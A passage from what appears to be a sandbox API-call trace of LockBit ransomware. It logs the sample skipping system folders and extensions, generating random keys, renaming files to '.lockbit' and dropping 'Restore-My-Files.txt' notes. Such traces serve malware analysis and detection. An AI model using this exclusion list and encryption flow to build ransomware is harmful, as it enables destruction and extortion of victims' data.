nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3d6ffc4, cFileName="..", cAlternateFileName="")) returned 1 [0100.233] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0100.233] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0100.233] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3d6ffc4, cFileName="1033", cAlternateFileName="")) returned 1 [0100.233] lstrcmpiW (lpString1=".", lpString2="1033") returned -1 [0100.233] lstrcmpiW (lpString1="..", lpString2="1033") returned -1 [0100.233] lstrcmpiW (lpString1="1033", lpString2="$windows.~bt") returned 1 [0100.233] lstrcmpiW (lpString1="1033", lpString2="intel") returned -1 [0100.233] lstrcmpiW (lpString1="1033", lpString2="msocache") returned -1 [0100.233] lstrcmpiW (lpString1="1033", lpString2="$recycle.bin") returned 1 [0100.233] lstrcmpiW (lpString1="1033", lpString2="$windows.~ws") returned 1 [0100.233] lstrcmpiW (lpString1="1033", lpString2="tor browser") returned -1 [0100.233] lstrcmpiW (lpString1="1033", lpString2="boot") returned -1 [0100.233] lstrcmpiW (lpString1="1033", lpString2="system volume information") returned -1 [0100.233] lstrcmpiW (lpString1="1033", lpString2="perflogs") returned -1 [0100.233] lstrcmpiW (lpString1="1033", lpString2="google") returned -1 [0100.233] lstrcmpiW (lpString1="1033", lpString2="application data") returned -1 [0100.234] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0100.234] lstrcmpiW (lpString1="1033", lpString2="windows.old") returned -1 [0100.234] lstrcmpiW (lpString1="1033", lpString2="appdata") returned -1 [0100.234] lstrcmpiW (lpString1="1033", lpString2="Windows nt") returned -1 [0100.234] lstrcmpiW (lpString1="1033", lpString2="Msbuild") returned -1 [0100.234] lstrcmpiW (lpString1="1033", lpString2="Microsoft") returned -1 [0100.234] lstrcmpiW (lpString1="1033", lpString2="All users") returned -1 [0100.234] lstrcmpiW (lpString1="1033", lpString2="mozilla") returned -1 [0100.234] lstrcmpiW (lpString1="1033", lpString2="Microsoft.NET") returned -1 [0100.234] lstrcmpiW (lpString1="1033", lpString2="microsoft shared") returned -1 [0100.234] lstrcmpiW (lpString1="1033", lpString2="Internet Explorer") returned -1 [0100.234] lstrcmpiW (lpString1="1033", lpString2="common files") returned -1 [0100.234] lstrcmpiW (lpString1="1033", lpString2="opera") returned -1 [0100.234] lstrcmpiW (lpString1="1033", lpString2="Windows Journal") returned -1 [0100.234] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033") returned 72 [0100.234] wsprintfW (in: param_1=0x3d6a0d8, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\*") returned 74 [0100.234] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6a4f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6a4f8) returned 0x55ff38 [0100.241] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0100.241] FindNextFileW (in: hFindFile=0x55ff38, lpFindFileData=0x3d6a4f8 | out: lpFindFileData=0x3d6a4f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.241] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0100.241] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0100.241] FindNextFileW (in: hFindFile=0x55ff38, lpFindFileData=0x3d6a4f8 | out: lpFindFileData=0x3d6a4f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9f68100, ftCreationTime.dwHighDateTime=0x1c9b09b, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd9f68100, ftLastWriteTime.dwHighDateTime=0x1c9b09b, nFileSizeHigh=0x0, nFileSizeLow=0xa2b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmdsrv.rll", cAlternateFileName="")) returned 1 [0100.242] lstrcmpiW (lpString1=".", lpString2="msmdsrv.rll") returned -1 [0100.242] lstrcmpiW (lpString1="..", lpString2="msmdsrv.rll") returned -1 [0100.242] PathFindExtensionW (pszPath="msmdsrv.rll") returned=".rll" [0100.242] lstrcmpiW (lpString1=".386", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".cmd", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".exe", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".ani", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".adv", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".theme", lpString2=".rll") returned 1 [0100.242] lstrcmpiW (lpString1=".msi", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".msp", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".com", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".diagpkg", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".nls", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".diagcab", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".lock", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".ocx", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".mpa", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".cpl", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".mod", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".hta", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".icns", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".prf", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".rtp", lpString2=".rll") returned 1 [0100.242] lstrcmpiW (lpString1=".diagcfg", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".msstyles", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".bin", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".hlp", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".shs", lpString2=".rll") returned 1 [0100.242] lstrcmpiW (lpString1=".drv", lpString2=".rll") returned -1 [0100.242] lstrcmpiW (lpString1=".wpx", lpString2=".rll") returned 1 [0100.243] lstrcmpiW (lpString1=".bat", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1=".rom", lpString2=".rll") returned 1 [0100.243] lstrcmpiW (lpString1=".msc", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1=".spl", lpString2=".rll") returned 1 [0100.243] lstrcmpiW (lpString1=".ps1", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1=".msu", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1=".ics", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1=".key", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1=".mp3", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1=".reg", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1=".dll", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1=".ini", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1=".idx", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1=".sys", lpString2=".rll") returned 1 [0100.243] lstrcmpiW (lpString1=".hlp", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1=".ico", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1=".lnk", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1=".rdp", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1=".lockbit", lpString2=".rll") returned -1 [0100.243] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="msmdsrv.rll") returned 1 [0100.243] lstrcmpiW (lpString1="ntldr", lpString2="msmdsrv.rll") returned 1 [0100.243] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="msmdsrv.rll") returned 1 [0100.243] lstrcmpiW (lpString1="bootsect.bak", lpString2="msmdsrv.rll") returned -1 [0100.243] lstrcmpiW (lpString1="autorun.inf", lpString2="msmdsrv.rll") returned -1 [0100.243] lstrcmpiW (lpString1="thumbs.db", lpString2="msmdsrv.rll") returned 1 [0100.243] lstrcmpiW (lpString1="iconcache.db", lpString2="msmdsrv.rll") returned -1 [0100.243] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\") returned="" [0100.243] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned=".rll" [0100.244] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0100.244] lstrcmpiW (lpString1=".7z", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".ckp", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".dacpac", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".db", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".db-shm", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".db-wal", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".db3", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".dbc", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".dbs", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".dbt", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".dbv", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".frm", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".mdf", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".mrg", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".mwb", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".myd", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".ndf", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".qry", lpString2=".rll") returned -1 [0100.244] lstrcmpiW (lpString1=".sdb", lpString2=".rll") returned 1 [0100.244] lstrcmpiW (lpString1=".sdf", lpString2=".rll") returned 1 [0100.244] lstrcmpiW (lpString1=".sql", lpString2=".rll") returned 1 [0100.244] lstrcmpiW (lpString1=".sqlite", lpString2=".rll") returned 1 [0100.244] lstrcmpiW (lpString1=".sqlite3", lpString2=".rll") returned 1 [0100.244] lstrcmpiW (lpString1=".sqlitedb", lpString2=".rll") returned 1 [0100.244] lstrcmpiW (lpString1=".tmd", lpString2=".rll") returned 1 [0100.244] wsprintfW (in: param_1=0x3d69a40, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.lockbit") returned 92 [0100.244] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0100.245] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.245] malloc (_Size=0x40068) returned 0x3d70048 [0100.245] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=666456) returned 1 [0100.245] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.248] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0100.248] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.250] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0100.250] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0100.409] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.lockbit", NtPathName=0x3d6a098, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.409] malloc (_Size=0xce) returned 0x77d800 [0100.410] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d69e64, FileInformation=0x77d800, Length=0xce, FileInformationClass=0xa) returned 0x0 [0100.426] free (_Block=0x77d800) [0100.426] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033") returned 1 [0100.430] wsprintfW (in: param_1=0x3d69c50, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\Restore-My-Files.txt") returned 93 [0100.430] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e0 [0100.442] CreateIoCompletionPort (FileHandle=0x13e0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.442] malloc (_Size=0x40068) returned 0x3ef0008 [0100.442] WriteFile (in: hFile=0x13e0, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0100.444] FindNextFileW (in: hFindFile=0x55ff38, lpFindFileData=0x3d6a4f8 | out: lpFindFileData=0x3d6a4f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2512f000, ftCreationTime.dwHighDateTime=0x1c8e1fe, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2512f000, ftLastWriteTime.dwHighDateTime=0x1c8e1fe, nFileSizeHigh=0x0, nFileSizeLow=0x3a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="msolui100.rll", cAlternateFileName="MSOLUI~1.RLL")) returned 1 [0100.444] lstrcmpiW (lpString1=".", lpString2="msolui100.rll") returned -1 [0100.444] lstrcmpiW (lpString1="..", lpString2="msolui100.rll") returned -1 [0100.444] PathFindExtensionW (pszPath="msolui100.rll") returned=".rll" [0100.444] lstrcmpiW (lpString1=".386", lpString2=".rll") returned -1 [0100.444] lstrcmpiW (lpString1=".cmd", lpString2=".rll") returned -1 [0100.444] lstrcmpiW (lpString1=".exe", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".ani", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".adv", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".theme", lpString2=".rll") returned 1 [0100.445] lstrcmpiW (lpString1=".msi", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".msp", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".com", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".diagpkg", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".nls", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".diagcab", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".lock", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".ocx", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".mpa", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".cpl", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".mod", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".hta", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".icns", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".prf", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".rtp", lpString2=".rll") returned 1 [0100.445] lstrcmpiW (lpString1=".diagcfg", lpString2=".rll") returned -1 [0100.445] lstrcmpiW (lpString1=".msstyles", lpString2=".rll") returned -1 [0100.446] lstrcmpiW (lpString1=".bin", lpString2=".rll") returned -1 [0100.446] lstrcmpiW (lpString1=".hlp", lpString2=".rll") returned -1 [0100.446] lstrcmpiW (lpString1=".shs", lpString2=".rll") returned 1 [0100.446] lstrcmpiW (lpString1=".drv", lpString2=".rll") returned -1 [0100.446] lstrcmpiW (lpString1=".wpx", lpString2=".rll") returned 1 [0100.446] lstrcmpiW (lpString1=".bat", lpString2=".rll") returned -1 [0100.446] lstrcmpiW (lpString1=".rom", lpString2=".rll") returned 1 [0100.446] lstrcmpiW (lpString1=".msc", lpString2=".rll") returned -1 [0100.446] lstrcmpiW (lpString1=".spl", lpString2=".rll") returned 1 [0100.446] lstrcmpiW (lpString1=".ps1", lpString2=".rll") returned -1 [0100.446] lstrcmpiW (lpString1=".msu", lpString2=".rll") returned -1 [0100.446] lstrcmpiW (lpString1=".ics", lpString2=".rll") returned -1 [0100.446] lstrcmpiW (lpString1=".key", lpString2=".rll") returned -1 [0100.446] lstrcmpiW (lpString1=".mp3", lpString2=".rll") returned -1 [0100.446] lstrcmpiW (lpString1=".reg", lpString2=".rll") returned -1 [0100.446] lstrcmpiW (lpString1=".dll", lpString2=".rll") returned -1 [0100.446] lstrcmpiW (lpString1=".ini", lpString2=".rll") returned -1 [0100.446] lstrcmpiW (lpString1=".idx", lpString2=".rll") returned -1 [0100.446] lstrcmpiW (lpString1=".sys", lpString2=".rll") returned 1 [0100.447] lstrcmpiW (lpString1=".hlp", lpString2=".rll") returned -1 [0100.447] lstrcmpiW (lpString1=".ico", lpString2=".rll") returned -1 [0100.447] lstrcmpiW (lpString1=".lnk", lpString2=".rll") returned -1 [0100.447] lstrcmpiW (lpString1=".rdp", lpString2=".rll") returned -1 [0100.447] lstrcmpiW (lpString1=".lockbit", lpString2=".rll") returned -1 [0100.447] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="msolui100.rll") returned 1 [0100.447] lstrcmpiW (lpString1="ntldr", lpString2="msolui100.rll") returned 1 [0100.447] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="msolui100.rll") returned 1 [0100.447] lstrcmpiW (lpString1="bootsect.bak", lpString2="msolui100.rll") returned -1 [0100.447] lstrcmpiW (lpString1="autorun.inf", lpString2="msolui100.rll") returned -1 [0100.447] lstrcmpiW (lpString1="thumbs.db", lpString2="msolui100.rll") returned 1 [0100.447] lstrcmpiW (lpString1="iconcache.db", lpString2="msolui100.rll") returned -1 [0100.447] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\") returned="" [0100.447] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned=".rll" [0100.447] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0100.447] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0100.447] lstrcmpiW (lpString1=".7z", lpString2=".rll") returned -1 [0100.447] lstrcmpiW (lpString1=".ckp", lpString2=".rll") returned -1 [0100.447] lstrcmpiW (lpString1=".dacpac", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".db", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".db-shm", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".db-wal", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".db3", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".dbc", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".dbs", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".dbt", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".dbv", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".frm", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".mdf", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".mrg", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".mwb", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".myd", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".ndf", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".qry", lpString2=".rll") returned -1 [0100.448] lstrcmpiW (lpString1=".sdb", lpString2=".rll") returned 1 [0100.448] lstrcmpiW (lpString1=".sdf", lpString2=".rll") returned 1 [0100.448] lstrcmpiW (lpString1=".sql", lpString2=".rll") returned 1 [0100.448] lstrcmpiW (lpString1=".sqlite", lpString2=".rll") returned 1 [0100.449] lstrcmpiW (lpString1=".sqlite3", lpString2=".rll") returned 1 [0100.449] lstrcmpiW (lpString1=".sqlitedb", lpString2=".rll") returned 1 [0100.449] lstrcmpiW (lpString1=".tmd", lpString2=".rll") returned 1 [0100.449] wsprintfW (in: param_1=0x3d69a40, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.lockbit") returned 94 [0100.449] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x334 [0100.449] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0100.450] malloc (_Size=0x40068) returned 0x3db00b8 [0100.453] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=14872) returned 1 [0100.453] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.470] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0100.470] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.474] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0100.474] ReadFile (in: hFile=0x334, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0100.576] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.lockbit", NtPathName=0x3d6a098, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.576] malloc (_Size=0xd2) returned 0x77d800 [0100.576] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x3d69e64, FileInformation=0x77d800, Length=0xd2, FileInformationClass=0xa) returned 0xc0000008 [0100.586] free (_Block=0x77d800) [0100.586] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" | out: pszPath="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033") returned 1 [0100.586] wsprintfW (in: param_1=0x3d69c50, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\Restore-My-Files.txt") returned 93 [0100.586] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0100.586] FindNextFileW (in: hFindFile=0x55ff38, lpFindFileData=0x3d6a4f8 | out: lpFindFileData=0x3d6a4f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2512f000, ftCreationTime.dwHighDateTime=0x1c8e1fe, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2512f000, ftLastWriteTime.dwHighDateTime=0x1c8e1fe, nFileSizeHigh=0x0, nFileSizeLow=0x3a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="msolui100.rll", cAlternateFileName="MSOLUI~1.RLL")) returned 0 [0100.586] FindClose (in: hFindFile=0x55ff38 | out: hFindFile=0x55ff38) returned 1 [0100.587] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3d6ffc4, cFileName="1033", cAlternateFileName="")) returned 0 [0100.587] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0100.587] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, 